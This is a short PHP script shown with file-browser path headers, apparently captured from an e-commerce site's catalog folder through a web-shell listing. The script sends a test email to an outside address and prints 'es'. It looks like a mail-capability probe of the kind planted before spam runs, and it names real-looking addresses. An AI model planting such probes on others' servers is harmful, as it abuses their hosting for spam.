????
| Current Path : /home2/morganrand/www/ecommerce/os/catalog/ |
| Current File : /home2/morganrand/www/ecommerce/os/catalog/amylotst.php |
<?php
// The message
$message = "Line 1\nLine 2\nLine 3";
// In case any of our lines are larger than 70 characters, we should use wordwrap()
$message = wordwrap($message, 70);
// Send
//mail('de_gur@yahoo.com', 'My Subject', $message);
mail('design_new@wanderfuls.com', 'My1 Subject', $message);
echo "es";
?>